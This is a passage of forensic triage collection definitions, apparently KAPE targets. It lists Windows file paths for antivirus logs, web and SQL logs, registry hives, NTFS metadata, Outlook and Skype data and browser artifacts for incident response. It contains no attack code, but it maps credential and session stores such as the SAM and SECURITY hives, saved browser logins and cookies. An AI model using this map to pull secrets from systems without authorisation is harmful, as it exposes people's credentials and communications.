       Category: AntiVirus

       Path: C:\ProgramData\Mcafee\VirusScan\

       IsDirectory: true

       Recursive: true

McAfee_ePO

Description: McAfee ePO Log Files

Author: Doug Metz

Version: 1

Id: 8e893785-6bf2-4990-a783-35b0f5e1b442

RecreateDirectories: True

Targets:

   -

       Name: McAfee ePO Logs

       Category: AntiVirus

       Path: C:\ProgramData\McAfee\Endpoint Security\Logs

       IsDirectory: true

       Recursive: true

MalwareBytes

Description: Malwarebytes Data

Author: Drew Ervin

Version: 1.0

Id: 3509c461-f6ef-499f-87e0-27bb30633259

RecreateDirectories: true

Targets:

   -

       Name: MalwareBytes Anti-Malware Logs

       Category: Antivirus

       Path: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-*.xml

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: MalwareBytes Anti-Malware Service Logs

       Category: Antivirus

       Path: C:\ProgramData\Malwarebytes\MBAMService\logs\mbamservice.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: MalwareBytes Anti-Malware Scan Logs

       Category: Antivirus

       Path: C:\Users\*\AppData\Roaming\Malwarebytes\Malwarebytes Anti-Malware\Logs

       IsDirectory: true

       Recursive: true

       Comment: ""

HitmanPro

Description: HitmanPro Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: db98e01b-bd07-4b40-a6ef-e75bdef39bb2

RecreateDirectories: true

Targets:

   -

       Name: HitmanPro Logs

       Category: Antivirus

       Path: C:\ProgramData\HitmanPro\Logs

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: HitmanPro Alert Logs

       Category: Antivirus

       Path: C:\ProgramData\HitmanPro.Alert\Logs

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: HitmanPro Database

       Category: Antivirus

       Path: C:\ProgramData\HitmanPro.Alert\excalibur.db

       IsDirectory: false

       Recursive: false

       Comment: "SQl Lite DB"

FSecure

Description: F-Secure Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: 8bfd6f82-f867-4ce2-89ac-22802ff9a15f

RecreateDirectories: true

Targets:

   -

       Name: F-Secure Logs

       Category: Antivirus

       Path: C:\ProgramData\F-Secure\Log\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: F-Secure User Logs

       Category: Antivirus

       Path: C:\Users\*\AppData\Local\F-Secure\Log\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: F-Secure Scheduled Scan Reports

       Category: Antivirus

       Path: C:\ProgramData\F-Secure\Antivirus\ScheduledScanReports\

       IsDirectory: true

       Recursive: true

       Comment: ""

ESET

Description: ESET Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: 14ac7bff-2d77-4582-8558-73cf75805aaa

RecreateDirectories: true

Targets:

   -

       Name: ESET NOD32 AV Logs (XP)

       Category: Antivirus

       Path: C:\Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: ESET NOD32 AV Logs

       Category: Antivirus

       Path: C:\ProgramData\ESET\ESET NOD32 Antivirus\Logs\

       IsDirectory: true

       Recursive: true

       Comment: "Parser available at https://github.com/laciKE/EsetLogParser"

ComboFix

Description: ComboFix Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: 8fb8608e-65ab-4fd1-b7a4-13618caf5ad7

RecreateDirectories: true

Targets:

   -

       Name: ComboFix

       Category: Antivirus

       Path: C:\ComboFix.txt

       IsDirectory: false

       Recursive: false

       Comment: ""

Bitdefender

Description: Bitdefender Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: e48c32bf-4069-4f79-acac-4ed181fa84c9

RecreateDirectories: true

Targets:

   -

       Name: Bitdefender Endpoint Security Logs

       Category: Antivirus

       Path: C:\ProgramData\Bitdefender\Endpoint Security\Logs\

       IsDirectory: true

       Recursive: true

       Comment: ""

AviraAVLogs

Description: Avira Logs

Author: Fabian Murer

Version: 1.0

Id: f977c6c9-378b-4812-a5ca-1f6c5fe57b18

RecreateDirectories: true

Targets:

   -

       Name: Avira Activity Logs

       Category: AntiVirus

       Path: C:\ProgramData\Avira\Antivirus\LOGFILES

       IsDirectory: true

       Recursive: true

       Comment: "Collects the scan logs of Avira AntiVirus"

Avast

Description: Avast Antivirus Data

Author: Drew Ervin

Version: 1.0

Id: 8b625ea2-fafa-46be-8ba1-15efd1de2a53

RecreateDirectories: true

Targets:

   -

       Name: Avast AV Logs (XP)

       Category: Antivirus

       Path: C:\Documents And Settings\All Users\Application Data\Avast Software\Avast\Log

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Avast AV Logs

       Category: Antivirus

       Path: C:\ProgramData\Avast Software\Avast\Log\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Avast AV User Logs

       Category: Antivirus

       Path: C:\Users\*\Avast Software\Avast\Log

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Avast AV Index

       Category: Antivirus

       Path: C:\ProgramData\Avast Software\Avast\Chest\index.xml

       IsDirectory: false

       Recursive: false

       Comment: ""

Logs
PowerShellConsole

Description: PowerShell Console Log File

Author: Mike Cary

Version: 1

Id: efa4332a-89eb-430c-ab61-006a9e6620d7

RecreateDirectories: true

Targets:

   -

       Name: PowerShell Console Log

       Category: PowerShellConsleLog

       Path: C:\users\*\Appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

       IsDirectory: false

       Recursive: false

       Comment: ""

NGINXLogs

Description: NGINX Log Files

Author: Eric Capuano

Version: 1

Id: d5c2cfd9-a8a5-400e-8be5-a8e9b5653a51

RecreateDirectories: true

Targets:

   -

       Name: NGINX Log Files

       Category: Logs

       Path: C:\nginx\logs\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

MSSQLErrorLogs

Description: MS SQL ErrorLogs

Author: Troy Larson

Version: 1

Id: cb789cbf-bf4a-4491-b6d9-9e2d002bd85e

RecreateDirectories: true

Targets:

   -

       Name: MS SQL Errorlog

       Category: SQL Exploitation

       Path: C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: MS SQL Errorlogs

       Category: SQL Exploitation

       Path: C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG.*

       IsDirectory: false

       Recursive: false

       Comment: ""

IISLogFiles

Description: IIS Log Files

Author: Troy Larson

Version: 2

Id: 701573f6-0ce1-454d-af41-612713e22af5

RecreateDirectories: true

Targets:

   -

       Name: IIS log files

       Category: Logs

       Path: C:\Windows*\system32\LogFiles\W3SVC*\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: IIS log files

       Category: Logs

       Path: C:\inetpub\logs\LogFiles\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: IIS log files

       Category: Logs

       Path: C:\inetpub\logs\LogFiles\W3SVC*\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: IIS log files

       Category: Logs

       Path: C:\Resources\directory\* \LogFiles\Web\W3SVC*\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""

Apache

Description: Apache Access Log

Author: Hadar Yudovich

Version: 1

Id: 6ad85ab3-701a-409c-98b8-ea4ef806cdf0

RecreateDirectories: true

Targets:

   -

       Name: Apache Access Log

       Category: Webservers

       Path: C:\

       FileMask: 'access.log'

       IsDirectory: true

       Recursive: true

       Comment: "Locates Apache access.log file"

Targets
!SANS_Triage

Description: SANS Triage Collection. 

# No Compound Targets used in this target. That is intended to make this target

# "self documenting" for the SANS 500 Students.

Author: Mark Hallman

Version: 1

Id: 5dbe9218-fd3d-4d86-88aa-56001d38e7f5

RecreateDirectories: true

Targets:

# Event Logs

   -

       Name: Event logs XP

       Category: EventLogs

       Path: C:\Windows\system32\config\*.evt

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\*.evtx

       IsDirectory: false

       Recursive: false

       Comment: ""

# Evidence of Execution

   -

       Name: Prefetch

       Category: Prefetch

       Path: C:\Windows*\prefetch\*.pf

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RecentFileCache

       Category: ApplicationCompatability

       Path: C:\Windows*\AppCompat\Programs\RecentFileCache.bcf

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Amcache

       Category: ApplicationCompatibility

       Path: C:\Windows*\AppCompat\Programs\Amcache.hve

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Amcache transaction files

       Category: ApplicationCompatibility

       Path: C:\Windows*\AppCompat\Programs\Amcache.hve.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Syscache

       Category: Program Execution

       Path: C:\System Volume Information\Syscache.hve

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Syscache transaction files

       Category: Program Execution

       Path: C:\System Volume Information\Syscache.hve.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: PowerShell Console Log

       Category: PowerShellConsleLog

       Path: C:\users\*\Appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

       IsDirectory: false

       Recursive: false

       Comment: ""

# File System   

   -

       Name: $MFT

       Category: FileSystem

       Path: C:\$MFT

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $LogFile

       Category: FileSystem

       Path: C:\$LogFile

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $J

       Category: FileSystem

       Path: c:\$Extend\$UsnJrnl:$J

       IsDirectory: false

       Recursive: false

       SaveAsFileName: $J

       Comment: ""

   -

       Name: $Max

       Category: FileSystem

       Path: c:\$Extend\$UsnJrnl:$Max

       IsDirectory: false

       Recursive: false

       SaveAsFileName: $Max

       Comment: ""

   -

       Name: $SDS

       Category: FileSystem

       Path: c:\$Secure:$SDS

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $Secure_$SDS

       Comment: ""

   -

       Name: $Boot

       Category: FileSystem

       Path: c:\$Boot

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $T

       Category: FileSystem

       Path: c:\$Extend\$RmMetadata\$TxfLog\$Tops:$T

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $T

       Comment: ""

# Link Files and JumpLists       

   -

       Name: Lnk files from Recent

       Category: LnkFiles

       Path: C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent

       IsDirectory: true

       Recursive: true

       Comment: Also includes automatic and custom jumplist directories

   -

       Name: Lnk files from Microsoft Office Recent

       Category: LnkFiles

       Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent

       IsDirectory: true

       Recursive: true

       Comment: ""       

   -

       Name: Lnk files from Recent (XP)

       Category: LnkFiles

       Path: C:\Documents and Settings\*\Recent

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Desktop lnk files XP

       Category: LnkFiles

       Path: C:\Documents and Settings\*\Desktop\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Desktop lnk files

       Category: LnkFiles

       Path: C:\Users\*\Desktop\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Restore point lnk files XP

       Category: LnkFiles

       Path: C:\System Volume Information\_restore*\RP*\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

# Recycle Bin and Recycler

   -

       Name: $Recycle.Bin

       Category: Deleted Files

       Path: C:\$Recycle.Bin\*

       IsDirectory: false

       Recursive: true

       Comment: ""

   -

       Name: RECYCLER WinXP

       Category: Deleted Files

       Path: C:\RECYCLER\*

       IsDirectory: true

       Recursive: true

       Comment: ""

# System Registry Files

   -

       Name: SAM registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SAM.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SECURITY.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SOFTWARE.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SYSTEM.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SAM registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SAM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SECURITY

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SOFTWARE

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SYSTEM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RegBack registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\*.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SAM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SAM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SECURITY

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SOFTWARE

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SYSTEM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SYSTEM1

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Profile registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\systemprofile\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Profile registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\systemprofile\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Service registry hive

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Service registry transaction files

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Network Service registry hive

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Network Service registry transaction files

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Restore Points Registry Hives (XP)

       Category: Registry

       Path: C:\System Volume Information\_restore*\RP*\snapshot\_REGISTRY_*

       IsDirectory: false

       Recursive: false

       Comment: ""

# User Registry Files

   -

       Name: ntuser.dat registry hive XP

       Category: Registry

       Path: C:\Documents and Settings\*\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat registry hive

       Category: Registry

       Path: C:\Users\*\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat registry transaction files

       Category: Registry

       Path: C:\Users\*\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat DEFAULT registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\DEFAULT

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat DEFAULT transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\DEFAULT.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: UsrClass.dat registry hive

       Category: Registry

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: UsrClass.dat registry transaction files

       Category: Registry

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""  

# System Level Artifacts 

# Schedules Tasks

   -

       Name: at .job

       Category: Persistence

       Path: C:\Windows*\Tasks\*.job

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: at SchedLgU.txt

       Category: Persistence

       Path: C:\Windows*\Tasks\SchedLgU.txt

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: XML

       Category: Persistence

       Path: C:\Windows*\system32\Tasks

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: SRUM

       Category: Execution

       Path: C:\Windows*\System32\SRU

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Thumbcache DB

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db

       IsDirectory: false

       Recursive: false

       Comment: ""

# USB Devices Logs

   -

       Name: Setupapi.log XP

       Category: USBDevices

       Path: C:\Windows\setupapi.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Setupapi.log Win7+

       Category: USBDevices

       Path: C:\Windows*\inf\setupapi.dev.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: WindowsIndexSearch

       Category: FileKnowledge

       Path: C:\programdata\microsoft\search\data\applications\windows\Windows.edb

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: WBEM

       Category: WBEM

       Path: C:\Windows*\System32\wbem\Repository

       IsDirectory: true

       Recursive: true

       Comment: ""

# User Communication        

# Outlook PST and OST files

   -

       Name: PST XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.pst

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: OST XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.ost

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: PST

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.pst

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: OST

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.ost

       IsDirectory: false

       Recursive: false

       Comment: ""

           

# Skype

   -

       Name: main.db (App <v12)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: skype.db (App +v12)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\skype.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: main.db XP

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Skype\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: main.db Win7+

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Skype\*\main.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: s4l-[username].db (App +v8)

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\s4l-*.db

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: leveldb (Skype for Desktop +v8)

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\*.leveldb\*.log

       IsDirectory: false

       Recursive: false

       Comment: ""       

# Web Browser Artificats       

   -

       Name: Chrome bookmarks XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Cookies XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Cookies*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Session XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Tabs XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Favicons XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Favicons*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome History XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\History*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Session XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Tabs XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Preferences XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Preferences

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Shortcuts XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Shortcuts*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Top Sites XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Top Sites*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Visited Links XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Visited Links

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Web Data XP

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Web Data*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome bookmarks

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Cookies*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Session

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Current Tabs

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Favicons

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Favicons*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\History*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Session

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Session

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Last Tabs

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Tabs

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Preferences

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Preferences

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Shortcuts

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Shortcuts*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Top Sites

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Top Sites*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Visited Links

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Visited Links

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Web Data

       Category: Communications

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Web Data*

       IsDirectory: false

       Recursive: false

       Comment:

   -

       Name: Chrome Extension Files

       Category: Communication

       Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Extensions

       IsDirectory: true

       Recursive: true

   -

       Name: Chrome Extension Files XP

       Category: Communications

       Path: c:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Extensions

       IsDirectory: true

       Recursive: true

   -

       Name: Edge folder

       Category: Communications

       Path: C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe

       IsDirectory: True

       Recursive: True

       Comment: ""

   -

       Name: WebcacheV01.dat

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache

       IsDirectory: Yes

       Recursive: false

       Comment: ""

   -

       Name: Firefox Places

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Downloads

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\downloads.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Form history

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Signons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\signons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Webappstore

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\webappstore.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Favicons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\favicons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Addons

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\addons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Search

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\search.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Places (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\places.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Downloads (XP)   

       Category: Communications (XP)

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\downloads.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Form history (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\formhistory.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Cookies (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Forefox Signons (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\signons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Webappstore (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\webappstore.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Favicons (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\favicons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Addons (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\addons.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Firefox Search (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\search.sqlite*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat History

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat History subdirectory

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\*\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat temp internet files

       Category: Communications

       Path: C:\Documents and Settings\*\Local Settings\Temporary Internet Files\Content.IE5\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat cookies (XP)

       Category: Communications

       Path: C:\Documents and Settings\*\Cookies\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat UserData (XP)

       Category: Communications

